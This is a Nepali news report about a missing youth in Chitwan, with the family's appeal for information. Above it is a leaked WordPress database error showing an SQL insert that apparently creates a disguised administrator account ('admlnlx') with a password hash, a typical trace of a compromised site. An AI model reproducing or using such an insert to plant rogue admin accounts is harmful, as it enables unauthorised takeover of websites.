WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B33hIhwXuhhJYV0kHMog6MZfrq.50r.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-11 08:10:38', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर २८ –
चितवन चैनपुरका एक युवा एक सातादेखी वेपत्ता भएका छन् ।चैनपुर घर भई टाँडीमा वस्दै आएका करिव १७,१८ वर्षका दिनेश विक नाम गरेको युवा वेपत्ता भएका हुन् ।उनि टाँडीमा रहेको एक रेष्टुरेन्टमा काम गर्दै आइरहेका थिए । गत सोमवार रेष्टुरेन्ट वाट निस्किएका उनि परिवार आफन्त र साथिभाइको सम्पर्कमा छैनन् ।कालो वर्ण र करिव ५ फिट उचाइ भएका विकलाई भेट्नेले ९८२११७९१३०,९८४१३८५०९६ नम्मरमा खवर गरिदिन परिवारले अनुरोध गरेको छ ।